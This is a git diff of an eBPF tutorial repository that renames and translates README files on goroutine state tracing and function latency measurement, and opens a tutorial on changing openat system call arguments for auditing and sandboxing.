including system calls, network events, and process execution. In this blog, we'll focus on how eBPF can be used to trace the state transitions of goroutines in a Go program. - -## The eBPF Kernel Code - -Let's dive into the eBPF kernel code that makes this tracing possible. - -```c -#include -#include "goroutine.h" -#include -#include -#include - -#define GOID_OFFSET 0x98 - -struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); -} rb SEC(".maps"); - -SEC("uprobe/./go-server-http/main:runtime.casgstatus") -int uprobe_runtime_casgstatus(struct pt_regs *ctx) { - int newval = ctx->cx; - void *gp = ctx->ax; - struct goroutine_execute_data *data; - u64 goid; - if (bpf_probe_read_user(&goid, sizeof(goid), gp + GOID_OFFSET) == 0) { - data = bpf_ringbuf_reserve(&rb, sizeof(*data), 0); - if (data) { - u64 pid_tgid = bpf_get_current_pid_tgid(); - data->pid = pid_tgid; - data->tgid = pid_tgid >> 32; - data->goid = goid; - data->state = newval; - bpf_ringbuf_submit(data, 0); - } - } - return 0; -} - -char LICENSE[] SEC("license") = "GPL"; -``` - -1. **Header Files**: The code begins by including necessary header files, such as `vmlinux.h`, which provides kernel definitions, and `bpf_helpers.h`, which offers helper functions for eBPF programs. -2. **GOID_OFFSET**: The offset of the `goid` field is hardcoded to `0x98`, which is specific to the Go version and the program being traced. This offset may vary between different Go versions or programs. -3. **Ring Buffer Map**: A BPF ring buffer map is defined to store the goroutine execution data. This buffer allows the kernel to pass information to user space efficiently. -4. **Uprobe**: The core of this eBPF program is an uprobes (user-level probe) attached to the `runtime.casgstatus` function in the Go program. This function is responsible for changing the state of a goroutine, making it an ideal place to intercept and trace state transitions. -5. **Reading Goroutine ID**: The `bpf_probe_read_user` function reads the goroutine ID (`goid`) from the user space memory, using the predefined offset. -6. **Submitting Data**: If the goroutine ID is successfully read, the data is stored in the ring buffer along with the process ID, thread group ID, and the new state of the goroutine. This data is then submitted to the user space for analysis. - -## Running the Program - -To run this tracing program, follow these steps: - -1. **Compile the eBPF Code**: Compile the eBPF program using a compiler like `ecc` (eBPF Compiler Collection) and generate a package that can be loaded by an eBPF loader. - - ```bash - ecc goroutine.bpf.c goroutine.h - ``` - -2. **Run the eBPF Program**: Use an eBPF loader to run the compiled eBPF program. - - ```bash - ecli-rs run package.json - ``` - -3. **Output**: The program will output the state transitions of goroutines along with their `goid`, `pid`, and `tgid`. Here’s an example of the output: - - ```console - TIME STATE GOID PID TGID - 21:00:47 DEAD(6) 0 2542844 2542844 - 21:00:47 RUNNABLE(1) 0 2542844 2542844 - 21:00:47 RUNNING(2) 1 2542844 2542844 - 21:00:47 WAITING(4) 2 2542847 2542844 - ``` - -You can find the complete code in - -If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website to get more examples and complete tutorials. - -`Uprobe` in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode, compatible with kernel mode eBPF and can be faster for `uprobe`. - -### Conclusion - -Tracing goroutine states using eBPF provides deep insights into the execution of Go programs, especially in production environments where traditional debugging tools may fall short. By leveraging eBPF, developers can monitor and diagnose performance issues, ensuring their Go applications run efficiently. - -Keep in mind that the offsets used in this eBPF program are specific to the Go version and the program being traced. As Go evolves, these offsets may change, requiring updates to the eBPF code. - -In future explorations, we can extend this approach to trace other aspects of Go programs or even other languages, demonstrating the versatility and power of eBPF in modern software development. diff --git a/src/32-http2/README.md b/src/32-http2/README.zh.md similarity index 100% rename from src/32-http2/README.md rename to src/32-http2/README.zh.md diff --git a/src/33-funclatency/README.md b/src/33-funclatency/README.md index 2fe33b1..83c19f7 100644 --- a/src/33-funclatency/README.md +++ b/src/33-funclatency/README.md @@ -1,29 +1,29 @@ -# 使用 eBPF 测量函数延迟 +# Measuring Function Latency with eBPF -在现代软件系统中,了解函数的性能特性,尤其是那些对应用程序运行至关重要的函数的性能特性,是至关重要的。性能分析中的一个关键指标是**函数延迟**,即函数从开始到完成所花费的时间。通过分析函数延迟,开发人员可以识别瓶颈、优化性能,并确保系统在各种条件下高效运行。 +In modern software systems, understanding the performance characteristics of functions—especially those critical to the operation of your application—is paramount. One key metric in performance analysis is **function latency**, which is the time taken by a function to execute from start to finish. By analyzing function latency, developers can identify bottlenecks, optimize performance, and ensure that their systems operate efficiently under various conditions. -本文将深入探讨如何使用 eBPF 这一强大的工具来测量函数延迟,并展示如何在内核和用户空间中进行跟踪和监控。 +This blog post will dive into how to measure function latency using eBPF, an incredibly powerful tool for tracing and monitoring both kernel and user-space programs. -## 什么是 eBPF? +## What is eBPF? -eBPF(扩展伯克利包过滤器)是一项革命性的技术,它允许开发人员编写小型程序在 Linux 内核中运行。eBPF 最初是为数据包过滤设计的,但它已经发展成为一个多功能工具,用于跟踪、监控和分析系统行为。通过 eBPF,您几乎可以对 Linux 内核或用户空间的任何部分进行插桩,从而收集性能数据、执行安全策略,甚至实时调试系统——这一切都无需修改内核源码或重启系统。 +eBPF (Extended Berkeley Packet Filter) is a revolutionary technology that allows developers to write small programs that run in the Linux kernel. Originally designed for packet filtering, eBPF has evolved into a versatile tool for tracing, monitoring, and profiling system behavior. With eBPF, you can instrument almost any part of the Linux kernel or user-space programs to collect performance data, enforce security policies, or even debug systems in real time—all without the need to modify the kernel source code or restart the system. -eBPF 程序在内核的沙盒环境中执行,确保了安全性和稳定性。这些程序可以附加到内核中的各种钩子上,如系统调用、网络事件和跟踪点,甚至可以通过 uprobes(用户级探针)附加到用户空间的函数。eBPF 程序收集的数据可以导出到用户空间进行分析,使其成为系统可观测性的重要工具。内核模式 eBPF 运行时的 `Uprobe` 可能会带来较大的性能开销。在这种情况下,你也可以考虑使用用户模式的 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。 +eBPF programs are executed in a sandboxed environment within the kernel, ensuring safety and stability. These programs can attach to various hooks within the kernel, such as system calls, network events, and tracepoints, or even user-space functions using uprobes (user-level probes). The data collected by eBPF programs can then be exported to user space for analysis, making it an invaluable tool for system observability. `Uprobe` in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). -## 为什么函数延迟很重要? +## Why is Function Latency Important? -函数延迟是内核和用户空间应用程序性能分析中的一个关键指标。它提供了关于特定函数执行时间的洞察,这对以下方面至关重要: +Function latency is a critical metric in performance analysis for both kernel and user-space applications. It provides insights into how long a particular function takes to execute, which is crucial for: -- **识别性能瓶颈**:高函数延迟可能表明代码中存在需要优化的低效或问题。 -- **确保系统响应能力**:在实时系统或对延迟敏感的应用程序中,理解和最小化函数延迟对于保持响应能力至关重要。 -- **性能分析和基准测试**:通过测量各种函数的延迟,开发人员可以对系统进行基准测试,并比较不同实现或配置的性能。 -- **调试和诊断**:当系统表现出意外行为或性能下降时,测量函数延迟可以帮助定位问题的根源。 +- **Identifying Performance Bottlenecks**: High function latency may indicate inefficiencies or issues within the code that need optimization. +- **Ensuring System Responsiveness**: In real-time systems or latency-sensitive applications, understanding and minimizing function latency is essential to maintain responsiveness. +- **Profiling and Benchmarking**: By measuring the latency of various functions, developers can benchmark their systems and compare the performance of different implementations or configurations. +- **Debugging and Diagnostics**: When a system exhibits unexpected behavior or performance degradation, measuring function latency can help pinpoint the source of the problem. -内核空间(如系统调用、文件操作)和用户空间(如库函数)中的函数都可以进行延迟分析,从而提供系统性能的全面视图。 +Both kernel-space (e.g., system calls, file operations) and user-space (e.g., library functions) functions can be profiled for latency, providing a comprehensive view of system performance. -## 用于函数延迟的 eBPF 内核代码 +## eBPF Kernel Code for Function Latency -以下是一个设计用于测量函数延迟的 eBPF 程序,它通过挂钩函数的入口和出口点来实现。该程序使用 kprobes 和 kretprobes(用于内核函数)或 uprobes 和 uretprobes(用于用户空间函数)来捕获函数执行的开始和结束时间。 +Below is an eBPF program designed to measure the latency of a function by hooking into its entry and exit points. The program uses kprobes and kretprobes (for kernel functions) or uprobes and uretprobes (for user-space functions) to capture the start and end times of the function execution. ```c // SPDX-License-Identifier: GPL-2.0 @@ -107,27 +107,27 @@ int BPF_KRETPROBE(dummy_kretprobe) char LICENSE[] SEC("license") = "GPL"; ``` -### 代码解释 +### Explanation of the Code -1. **头文件**:代码首先包含了必要的头文件,如 `vmlinux.h`(提供内核定义)和 `bpf_helpers.h`(提供 eBPF 程序的辅助函数)。 +1. **Header Files**: The code begins by including the necessary headers like `vmlinux.h` (which provides kernel definitions) and `bpf_helpers.h` (which offers helper functions for eBPF programs). -2. **全局变量**:`targ_tgid` 是目标进程 ID(或线程组 ID),`units` 确定延迟测量的时间单位(如微秒或毫秒)。 +2. **Global Variables**: `targ_tgid` is a target process ID (or thread group ID), and `units` determines the time unit for latency measurement (e.g., microseconds or milliseconds). -3. **BPF 映射**:定义了一个哈希映射(`starts`),用于存储每个进程 ID 的函数执行开始时间。另一个数组(`hist`)用于存储延迟分布。 +3. **BPF Maps**: A hash map (`starts`) is defined to store the start time of function executions for each process ID. Another array (`hist`) is used to store the latency distribution. -4. **入口函数**:`entry()` 函数在函数进入时捕获当前时间戳,并将其存储在以进程 ID 为键的 `starts` 映射中。 +4. **Entry Function**: The `entry()` function captures the current timestamp when the function is entered and stores it in the `starts` map keyed by the process ID. -5. **出口函数**:`exit()` 函数通过将存储的开始时间与当前时间相减来计算延迟。然后将结果分类到直方图槽中,并增加该槽的计数以记录该延迟范围的发生次数。 +5. **Exit Function**: The `exit()` function calculates the latency by subtracting the stored start time from the current time. The result is then categorized into a histogram slot, which is incremented to record the occurrence of that latency range. -6. **探针**:`kprobe` 和 `kretprobe` 用于附加到函数的入口和出口点。这些探针触发 `entry()` 和 `exit()` 函数来测量延迟。 +6. **Probes**: The `kprobe` and `kretprobe` are used to attach to the entry and exit points of the function, respectively. These probes trigger the `entry()` and `exit()` functions to measure the latency. -7. **许可证**:该程序根据 GPL 许可证发布,以确保符合内核的许可要求。 +7. **License**: The program is licensed under GPL to ensure compliance with kernel licensing requirements. -## 运行函数延迟工具 +## Running the Function Latency Tool -### 用户空间函数延迟 +### User-Space Function Latency -要跟踪用户空间函数(例如 `libc` 库中的 `read` 函数)的延迟,可以运行以下命令: +To trace the latency of a user-space function, such as the `read` function in the `libc` library, you can run the following command: ```console # ./funclatency /usr/lib/x86_64-linux-gnu/libc.so.6:read @@ -152,9 +152,9 @@ Tracing /usr/lib/x86_64-linux-gnu/libc.so.6:read. Hit Ctrl-C to exit Exiting trace of /usr/lib/x86_64-linux-gnu/libc.so.6:read ``` -### 内核空间函数延迟 +### Kernel-Space Function Latency -要跟踪内核空间函数(例如 `vfs_read`)的延迟,可以运行以下命令: +To trace the latency of a kernel-space function, such as `vfs_read`, run the following command: ```console # sudo ./funclatency -u vfs_read @@ -168,22 +168,22 @@ Tracing vfs_read. Hit Ctrl-C to exit 64 -> 127 : 184 |** | 1024 -> 2047 : 0 | | 4096 -> 8191 : 5 | | - 2097152 -> - -4194303 : 2 | | + 2097152 -> 4194303 : 2 | | Exiting trace of vfs_read ``` -这些命令会跟踪指定函数(无论是在用户空间还是内核空间)的执行,并打印出观察到的延迟的直方图,显示函数执行时间的分布。 +These commands trace the execution of the specified function, either in user-space or kernel-space, and print a histogram of the observed latencies, showing the distribution of function execution times. - +You can find the source code in -## 结论 +## Conclusion -使用 eBPF 测量函数延迟可以深入了解用户空间和内核空间代码的性能。通过了解函数延迟,开发人员可以识别性能瓶颈、提高系统响应能力,并确保其应用程序的顺畅运行。 +Measuring function latency with eBPF offers deep insights into the performance of both user-space and kernel-space code. By understanding function latency, developers can identify performance bottlenecks, improve system responsiveness, and ensure the smooth operation of their applications. -本文介绍了使用 eBPF 跟踪函数延迟的基本知识,包括实现该跟踪功能的 eBPF 内核代码概述。文中提供的示例展示了如何运行工具以跟踪用户空间和内核空间函数的延迟。 +This -如果您有兴趣了解更多关于 eBPF 的知识,包括更多高级示例和教程,请访问我们的[教程代码库](https://github.com/eunomia-bpf/bpf-developer-tutorial)或我们的网站 [Eunomia](https://eunomia.dev/tutorials/)。 + blog post covered the basics of using eBPF to trace function latency, including an overview of the eBPF kernel code used to perform the tracing. The examples provided demonstrated how to run the tool to trace both user-space and kernel-space functions. -如果您正在寻找一个用于函数延迟测量的生产就绪工具,您可能想查看 BCC 仓库中的完整实现:[BCC 仓库](https://github.com/iovisor/bcc/blob/master/libbpf-tools/funclatency.c)。 +For those interested in learning more about eBPF, including more advanced examples and tutorials, please visit our [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/). + +If you are looking for a production-ready tool for function latency measurement, you might want to check out the full implementation available in the [BCC repository](https://github.com/iovisor/bcc/blob/master/libbpf-tools/funclatency.c). diff --git a/src/33-funclatency/README.zh.md b/src/33-funclatency/README.zh.md new file mode 100644 index 0000000..2fe33b1 --- /dev/null +++ b/src/33-funclatency/README.zh.md @@ -0,0 +1,189 @@ +# 使用 eBPF 测量函数延迟 + +在现代软件系统中,了解函数的性能特性,尤其是那些对应用程序运行至关重要的函数的性能特性,是至关重要的。性能分析中的一个关键指标是**函数延迟**,即函数从开始到完成所花费的时间。通过分析函数延迟,开发人员可以识别瓶颈、优化性能,并确保系统在各种条件下高效运行。 + +本文将深入探讨如何使用 eBPF 这一强大的工具来测量函数延迟,并展示如何在内核和用户空间中进行跟踪和监控。 + +## 什么是 eBPF? + +eBPF(扩展伯克利包过滤器)是一项革命性的技术,它允许开发人员编写小型程序在 Linux 内核中运行。eBPF 最初是为数据包过滤设计的,但它已经发展成为一个多功能工具,用于跟踪、监控和分析系统行为。通过 eBPF,您几乎可以对 Linux 内核或用户空间的任何部分进行插桩,从而收集性能数据、执行安全策略,甚至实时调试系统——这一切都无需修改内核源码或重启系统。 + +eBPF 程序在内核的沙盒环境中执行,确保了安全性和稳定性。这些程序可以附加到内核中的各种钩子上,如系统调用、网络事件和跟踪点,甚至可以通过 uprobes(用户级探针)附加到用户空间的函数。eBPF 程序收集的数据可以导出到用户空间进行分析,使其成为系统可观测性的重要工具。内核模式 eBPF 运行时的 `Uprobe` 可能会带来较大的性能开销。在这种情况下,你也可以考虑使用用户模式的 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。 + +## 为什么函数延迟很重要? + +函数延迟是内核和用户空间应用程序性能分析中的一个关键指标。它提供了关于特定函数执行时间的洞察,这对以下方面至关重要: + +- **识别性能瓶颈**:高函数延迟可能表明代码中存在需要优化的低效或问题。 +- **确保系统响应能力**:在实时系统或对延迟敏感的应用程序中,理解和最小化函数延迟对于保持响应能力至关重要。 +- **性能分析和基准测试**:通过测量各种函数的延迟,开发人员可以对系统进行基准测试,并比较不同实现或配置的性能。 +- **调试和诊断**:当系统表现出意外行为或性能下降时,测量函数延迟可以帮助定位问题的根源。 + +内核空间(如系统调用、文件操作)和用户空间(如库函数)中的函数都可以进行延迟分析,从而提供系统性能的全面视图。 + +## 用于函数延迟的 eBPF 内核代码 + +以下是一个设计用于测量函数延迟的 eBPF 程序,它通过挂钩函数的入口和出口点来实现。该程序使用 kprobes 和 kretprobes(用于内核函数)或 uprobes 和 uretprobes(用于用户空间函数)来捕获函数执行的开始和结束时间。 + +```c +// SPDX-License-Identifier: GPL-2.0 +/* Copyright (c) 2021 Google LLC. */ +#include "vmlinux.h" +#include +#include +#include +#include "funclatency.h" +#include "bits.bpf.h" + +const volatile pid_t targ_tgid = 0; +const volatile int units = 0; + +/* key: pid. value: start time */ +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_PIDS); + __type(key, u32); + __type(value, u64); +} starts SEC(".maps"); + +__u32 hist[MAX_SLOTS] = {}; + +static void entry(void) +{ + u64 id = bpf_get_current_pid_tgid(); + u32 tgid = id >> 32; + u32 pid = id; + u64 nsec; + + if (targ_tgid && targ_tgid != tgid) + return; + nsec = bpf_ktime_get_ns(); + bpf_map_update_elem(&starts, &pid, &nsec, BPF_ANY); +} + +SEC("kprobe/dummy_kprobe") +int BPF_KPROBE(dummy_kprobe) +{ + entry(); + return 0; +} + +static void exit(void) +{ + u64 *start; + u64 nsec = bpf_ktime_get_ns(); + u64 id = bpf_get_current_pid_tgid(); + u32 pid = id; + u64 slot, delta; + + start = bpf_map_lookup_elem(&starts, &pid); + if (!start) + return; + + delta = nsec - *start; + + switch (units) { + case USEC: + delta /= 1000; + break; + case MSEC: + delta /= 1000000; + break; + } + + slot = log2l(delta); + if (slot >= MAX_SLOTS) + slot = MAX_SLOTS - 1; + __sync_fetch_and_add(&hist[slot], 1); +} + +SEC("kretprobe/dummy_kretprobe") +int BPF_KRETPROBE(dummy_kretprobe) +{ + exit(); + return 0; +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +### 代码解释 + +1. **头文件**:代码首先包含了必要的头文件,如 `vmlinux.h`(提供内核定义)和 `bpf_helpers.h`(提供 eBPF 程序的辅助函数)。 + +2. **全局变量**:`targ_tgid` 是目标进程 ID(或线程组 ID),`units` 确定延迟测量的时间单位(如微秒或毫秒)。 + +3. **BPF 映射**:定义了一个哈希映射(`starts`),用于存储每个进程 ID 的函数执行开始时间。另一个数组(`hist`)用于存储延迟分布。 + +4. **入口函数**:`entry()` 函数在函数进入时捕获当前时间戳,并将其存储在以进程 ID 为键的 `starts` 映射中。 + +5. **出口函数**:`exit()` 函数通过将存储的开始时间与当前时间相减来计算延迟。然后将结果分类到直方图槽中,并增加该槽的计数以记录该延迟范围的发生次数。 + +6. **探针**:`kprobe` 和 `kretprobe` 用于附加到函数的入口和出口点。这些探针触发 `entry()` 和 `exit()` 函数来测量延迟。 + +7. **许可证**:该程序根据 GPL 许可证发布,以确保符合内核的许可要求。 + +## 运行函数延迟工具 + +### 用户空间函数延迟 + +要跟踪用户空间函数(例如 `libc` 库中的 `read` 函数)的延迟,可以运行以下命令: + +```console +# ./funclatency /usr/lib/x86_64-linux-gnu/libc.so.6:read +tracing /usr/lib/x86_64-linux-gnu/libc.so.6:read... +tracing func read in /usr/lib/x86_64-linux-gnu/libc.so.6... +Tracing /usr/lib/x86_64-linux-gnu/libc.so.6:read. Hit Ctrl-C to exit +^C + nsec : count distribution + 0 -> 1 : 0 | | + 2 -> 3 : 0 | | + 4 -> 7 : 0 | | + 8 -> 15 : 0 | | + 16 -> 31 : 0 | | + 32 -> 63 : 0 | | + 128 -> 255 : 0 | | + 512 -> 1023 : 0 | | + 65536 -> 131071 : 651 |****************************************+| + 131072 -> 262143 : 107 |****** | + 262144 -> 524287 : 36 |** | + 524288 -> 1048575 : 8 | | + 8388608 -> 16777215 : 2 | | +Exiting trace of /usr/lib/x86_64-linux-gnu/libc.so.6:read +``` + +### 内核空间函数延迟 + +要跟踪内核空间函数(例如 `vfs_read`)的延迟,可以运行以下命令: + +```console +# sudo ./funclatency -u vfs_read +Tracing vfs_read. Hit Ctrl-C to exit +^C + usec : count distribution + 0 -> 1 : 0 | | + 8 -> 15 : 0 | | + 16 -> 31 : 3397 |****************************************| + 32 -> 63 : 2175 |************************* | + 64 -> 127 : 184 |** | + 1024 -> 2047 : 0 | | + 4096 -> 8191 : 5 | | + 2097152 -> + +4194303 : 2 | | +Exiting trace of vfs_read +``` + +这些命令会跟踪指定函数(无论是在用户空间还是内核空间)的执行,并打印出观察到的延迟的直方图,显示函数执行时间的分布。 + + + +## 结论 + +使用 eBPF 测量函数延迟可以深入了解用户空间和内核空间代码的性能。通过了解函数延迟,开发人员可以识别性能瓶颈、提高系统响应能力,并确保其应用程序的顺畅运行。 + +本文介绍了使用 eBPF 跟踪函数延迟的基本知识,包括实现该跟踪功能的 eBPF 内核代码概述。文中提供的示例展示了如何运行工具以跟踪用户空间和内核空间函数的延迟。 + +如果您有兴趣了解更多关于 eBPF 的知识,包括更多高级示例和教程,请访问我们的[教程代码库](https://github.com/eunomia-bpf/bpf-developer-tutorial)或我们的网站 [Eunomia](https://eunomia.dev/tutorials/)。 + +如果您正在寻找一个用于函数延迟测量的生产就绪工具,您可能想查看 BCC 仓库中的完整实现:[BCC 仓库](https://github.com/iovisor/bcc/blob/master/libbpf-tools/funclatency.c)。 diff --git a/src/33-funclatency/README_en.md b/src/33-funclatency/README_en.md deleted file mode 100644 index 83c19f7..0000000 --- a/src/33-funclatency/README_en.md +++ /dev/null @@ -1,189 +0,0 @@ -# Measuring Function Latency with eBPF - -In modern software systems, understanding the performance characteristics of functions—especially those critical to the operation of your application—is paramount. One key metric in performance analysis is **function latency**, which is the time taken by a function to execute from start to finish. By analyzing function latency, developers can identify bottlenecks, optimize performance, and ensure that their systems operate efficiently under various conditions. - -This blog post will dive into how to measure function latency using eBPF, an incredibly powerful tool for tracing and monitoring both kernel and user-space programs. - -## What is eBPF? - -eBPF (Extended Berkeley Packet Filter) is a revolutionary technology that allows developers to write small programs that run in the Linux kernel. Originally designed for packet filtering, eBPF has evolved into a versatile tool for tracing, monitoring, and profiling system behavior. With eBPF, you can instrument almost any part of the Linux kernel or user-space programs to collect performance data, enforce security policies, or even debug systems in real time—all without the need to modify the kernel source code or restart the system. - -eBPF programs are executed in a sandboxed environment within the kernel, ensuring safety and stability. These programs can attach to various hooks within the kernel, such as system calls, network events, and tracepoints, or even user-space functions using uprobes (user-level probes). The data collected by eBPF programs can then be exported to user space for analysis, making it an invaluable tool for system observability. `Uprobe` in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). - -## Why is Function Latency Important? - -Function latency is a critical metric in performance analysis for both kernel and user-space applications. It provides insights into how long a particular function takes to execute, which is crucial for: - -- **Identifying Performance Bottlenecks**: High function latency may indicate inefficiencies or issues within the code that need optimization. -- **Ensuring System Responsiveness**: In real-time systems or latency-sensitive applications, understanding and minimizing function latency is essential to maintain responsiveness. -- **Profiling and Benchmarking**: By measuring the latency of various functions, developers can benchmark their systems and compare the performance of different implementations or configurations. -- **Debugging and Diagnostics**: When a system exhibits unexpected behavior or performance degradation, measuring function latency can help pinpoint the source of the problem. - -Both kernel-space (e.g., system calls, file operations) and user-space (e.g., library functions) functions can be profiled for latency, providing a comprehensive view of system performance. - -## eBPF Kernel Code for Function Latency - -Below is an eBPF program designed to measure the latency of a function by hooking into its entry and exit points. The program uses kprobes and kretprobes (for kernel functions) or uprobes and uretprobes (for user-space functions) to capture the start and end times of the function execution. - -```c -// SPDX-License-Identifier: GPL-2.0 -/* Copyright (c) 2021 Google LLC. */ -#include "vmlinux.h" -#include -#include -#include -#include "funclatency.h" -#include "bits.bpf.h" - -const volatile pid_t targ_tgid = 0; -const volatile int units = 0; - -/* key: pid. value: start time */ -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_PIDS); - __type(key, u32); - __type(value, u64); -} starts SEC(".maps"); - -__u32 hist[MAX_SLOTS] = {}; - -static void entry(void) -{ - u64 id = bpf_get_current_pid_tgid(); - u32 tgid = id >> 32; - u32 pid = id; - u64 nsec; - - if (targ_tgid && targ_tgid != tgid) - return; - nsec = bpf_ktime_get_ns(); - bpf_map_update_elem(&starts, &pid, &nsec, BPF_ANY); -} - -SEC("kprobe/dummy_kprobe") -int BPF_KPROBE(dummy_kprobe) -{ - entry(); - return 0; -} - -static void exit(void) -{ - u64 *start; - u64 nsec = bpf_ktime_get_ns(); - u64 id = bpf_get_current_pid_tgid(); - u32 pid = id; - u64 slot, delta; - - start = bpf_map_lookup_elem(&starts, &pid); - if (!start) - return; - - delta = nsec - *start; - - switch (units) { - case USEC: - delta /= 1000; - break; - case MSEC: - delta /= 1000000; - break; - } - - slot = log2l(delta); - if (slot >= MAX_SLOTS) - slot = MAX_SLOTS - 1; - __sync_fetch_and_add(&hist[slot], 1); -} - -SEC("kretprobe/dummy_kretprobe") -int BPF_KRETPROBE(dummy_kretprobe) -{ - exit(); - return 0; -} - -char LICENSE[] SEC("license") = "GPL"; -``` - -### Explanation of the Code - -1. **Header Files**: The code begins by including the necessary headers like `vmlinux.h` (which provides kernel definitions) and `bpf_helpers.h` (which offers helper functions for eBPF programs). - -2. **Global Variables**: `targ_tgid` is a target process ID (or thread group ID), and `units` determines the time unit for latency measurement (e.g., microseconds or milliseconds). - -3. **BPF Maps**: A hash map (`starts`) is defined to store the start time of function executions for each process ID. Another array (`hist`) is used to store the latency distribution. - -4. **Entry Function**: The `entry()` function captures the current timestamp when the function is entered and stores it in the `starts` map keyed by the process ID. - -5. **Exit Function**: The `exit()` function calculates the latency by subtracting the stored start time from the current time. The result is then categorized into a histogram slot, which is incremented to record the occurrence of that latency range. - -6. **Probes**: The `kprobe` and `kretprobe` are used to attach to the entry and exit points of the function, respectively. These probes trigger the `entry()` and `exit()` functions to measure the latency. - -7. **License**: The program is licensed under GPL to ensure compliance with kernel licensing requirements. - -## Running the Function Latency Tool - -### User-Space Function Latency - -To trace the latency of a user-space function, such as the `read` function in the `libc` library, you can run the following command: - -```console -# ./funclatency /usr/lib/x86_64-linux-gnu/libc.so.6:read -tracing /usr/lib/x86_64-linux-gnu/libc.so.6:read... -tracing func read in /usr/lib/x86_64-linux-gnu/libc.so.6... -Tracing /usr/lib/x86_64-linux-gnu/libc.so.6:read. Hit Ctrl-C to exit -^C - nsec : count distribution - 0 -> 1 : 0 | | - 2 -> 3 : 0 | | - 4 -> 7 : 0 | | - 8 -> 15 : 0 | | - 16 -> 31 : 0 | | - 32 -> 63 : 0 | | - 128 -> 255 : 0 | | - 512 -> 1023 : 0 | | - 65536 -> 131071 : 651 |****************************************+| - 131072 -> 262143 : 107 |****** | - 262144 -> 524287 : 36 |** | - 524288 -> 1048575 : 8 | | - 8388608 -> 16777215 : 2 | | -Exiting trace of /usr/lib/x86_64-linux-gnu/libc.so.6:read -``` - -### Kernel-Space Function Latency - -To trace the latency of a kernel-space function, such as `vfs_read`, run the following command: - -```console -# sudo ./funclatency -u vfs_read -Tracing vfs_read. Hit Ctrl-C to exit -^C - usec : count distribution - 0 -> 1 : 0 | | - 8 -> 15 : 0 | | - 16 -> 31 : 3397 |****************************************| - 32 -> 63 : 2175 |************************* | - 64 -> 127 : 184 |** | - 1024 -> 2047 : 0 | | - 4096 -> 8191 : 5 | | - 2097152 -> 4194303 : 2 | | -Exiting trace of vfs_read -``` - -These commands trace the execution of the specified function, either in user-space or kernel-space, and print a histogram of the observed latencies, showing the distribution of function execution times. - -You can find the source code in - -## Conclusion - -Measuring function latency with eBPF offers deep insights into the performance of both user-space and kernel-space code. By understanding function latency, developers can identify performance bottlenecks, improve system responsiveness, and ensure the smooth operation of their applications. - -This - - blog post covered the basics of using eBPF to trace function latency, including an overview of the eBPF kernel code used to perform the tracing. The examples provided demonstrated how to run the tool to trace both user-space and kernel-space functions. - -For those interested in learning more about eBPF, including more advanced examples and tutorials, please visit our [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/). - -If you are looking for a production-ready tool for function latency measurement, you might want to check out the full implementation available in the [BCC repository](https://github.com/iovisor/bcc/blob/master/libbpf-tools/funclatency.c). diff --git a/src/34-syscall/README.md b/src/34-syscall/README.md index c2b63ab..e64e5f5 100644 --- a/src/34-syscall/README.md +++ b/src/34-syscall/README.md @@ -1,22 +1,22 @@ -# eBPF 开发实践:使用 eBPF 修改系统调用参数 +# eBPF Development Practice: Modifying System Call Arguments with eBPF -eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。 +eBPF (Extended Berkeley Packet Filter) is a powerful feature in the Linux kernel that allows user-defined code to be run, loaded, and updated without the need to modify kernel source code or reboot the kernel. This functionality has enabled a wide range of applications for eBPF, such as network and system performance analysis, packet filtering, and security policies. -本教程介绍了如何使用 eBPF 修改正在进行的系统调用参数。这种技术可以用作安全审计、系统监视、或甚至恶意行为。然而需要特别注意,篡改系统调用参数可能对系统的稳定性和安全性带来负面影响,因此必须谨慎使用。实现这个功能需要使用到 eBPF 的 `bpf_probe_write_user` 功能,它可以修改用户空间的内存,因此能用来修改系统调用参数,在内核读取用户空间内存之前,将其修改为我们想要的值。 +In this tutorial, we will explore how to use eBPF to modify the arguments of a running system call. This technique can be used for security auditing, system monitoring, or even malicious behavior. However, it is important to note that modifying system call arguments can have negative implications for system stability and security, so caution must be exercised. To implement this functionality, we will use the `bpf_probe_write_user` feature of eBPF, which allows us to modify memory in the user space and therefore modify system call arguments before the kernel reads them from user space. -本文的完整代码可以在 找到。 +The complete code for this tutorial can be found in the repository on GitHub. -## 修改 open 系统调用的文件名 +## Modifying the File Name of the `open` System Call -此功能用于修改 `openat` 系统调用的参数,让它打开一个不同的文件。这个功能可能可以用于: +This functionality is used to modify the arguments of the `openat` system call to open a different file. This technique can be useful for: -1. **文件访问审计**:在对法律合规性和数据安全性有严格要求的环境中,审计员可能需要记录所有对敏感文件的访问行为。通过修改 `openat` 系统调用参数,可以将所有尝试访问某个敏感文件的行为重定向到一个备份文件或者日志文件。 -2. **安全沙盒**:在开发早期阶段,可能希望监控应用程序尝试打开的文件。通过更改 `openat` 调用,可以让应用在一个安全的沙盒环境中运行,所有文件操作都被重定向到一个隔离的文件系统路径。 -3. **敏感数据保护**:对于存储有敏感信息的文件,例如配置文件中包含有数据库密码,一个基于 eBPF 的系统可以将这些调用重定向到一个加密的或暂存的位置,以增强数据安全性。 +1. **File Access Auditing**: In environments with strict legal and data security requirements, auditors may need to record access to sensitive files. By 